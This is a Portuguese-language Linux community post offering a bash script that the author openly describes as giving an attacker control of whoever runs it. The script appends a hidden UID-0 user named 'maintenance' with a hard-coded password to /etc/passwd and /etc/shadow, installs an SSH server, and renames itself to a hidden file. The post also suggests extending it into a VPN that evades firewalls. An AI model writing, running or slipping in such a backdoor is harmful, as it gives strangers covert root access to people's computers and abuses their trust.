Criando usuário com poderes de root
Publicado por Marcelo (última atualização em 17/10/2009)
[ Hits: 6.877 ]
Este script cria um usuário com poderes de root e ativa o ssh-server, dando ao atacante controle sobre o computador do executor do script.
Incrementando ele um pouco mais pode-se fazer maravilhas como, por exemplo, criar uma VPN diretamente entre o computador do atacante e do atacado (fugindo assim dos firewalls) e dando total acesso, através de ssh, e com poderes de super usuário ainda.
É, realmente o elo mais fraco da segurança da informação são as pessoas... administrador descuidado + usuário "bobinho" = caca!
#!/bin/bash # verifica se o usuário está como root if [ "`id -u`" != "0" ]; then echo 'Este script precisa ser executado como root. Digite "sudo su" para se logar como root e execute o script novamente.' read pausa exit 0 fi # verifica se o script de cadastro de senha existe, se não, ele mesmo o cria # o usuário será maintenance e a senha mdpasswd if [ "`find -name cad.main`" = "" ]; then touch cad.main echo "#!/usr/bin/expect" >> cad.main echo "set timeout 30" >> cad.main echo "spawn passwd maintenance" >> cad.main echo "set password \"mdpasswd"\" >> cad.main echo "expect \"Enter new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "expect \"Retype new UNIX password:"\" >> cad.main echo "send "\""$""password\r\"" >> cad.main echo "send \"exit"\" >> cad.main echo "expect \"eof\"" >> cad.main chmod +x cad.main fi # verifica se o programa expect está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep expect `" = "" ]; then aptitude install expect >> /dev/null fi # verifica se o servidor ssh está instalado, se não estiver, ele o instala if [ "`dpkg -l | grep openssh-server`" = "" ]; then aptitude install openssh-server >> /dev/null fi # verifica se já existe algum usuário com este nome, se existir ele alterará a senha deste usuário para mdpasswd if [ "`cat /etc/passwd | grep maintenance`" != "" ]; then expect cad.main >> /dev/null exit 0 fi # se o usuário não existir, ele será criado echo "maintenance:x:0:0:maintenance:/root:/bin/bash" >> /etc/passwd echo "maintenance:*:10091:0:99999:7:::" >> /etc/shadow expect cad.main >> /dev/null # remove o arquivo de cadastro de usuário rm -rf cad.min # oculta este script mv login.super .login.super exit 1
Atualização Automática do Uvscan (Antivirus for linux)
Criação de unidades criptografadas
Monitoração e coleta de dados de performance de servidores GNU/Linux
Bloquear ataques DDoS com bloqueio de range de IPs e avisar por e-mail
Nenhum comentário foi encontrado.
Atenção a quem posta conteúdo de dicas, scripts e tal (2)
Criando um gateway de internet com o Debian
Configuração básica do Conky para mostrar informações sobre a sua máquina no Desktop
Aprenda a criar músicas com Inteligência Artificial usando Suno AI
Entendendo o que é URI, URL, URN e conhecendo as diferenças entre POST e GET
Ativando o Modo Noturno via Linha de Comando no GNOME/Wayland
Preparando pendrive com GNU/Linux [Corretamente!]
Instalando Google Chrome no Fedora 40
Habilitando a importação de senhas no Firefox
Como corrigir o erro do VirtualBox travar a máquina virtual em tela cheia
Altera pacote .pkg.tar do Arch Linux (19)
Navegadores com linhas na tela (6)
Pi Network.... alguém minera? (5)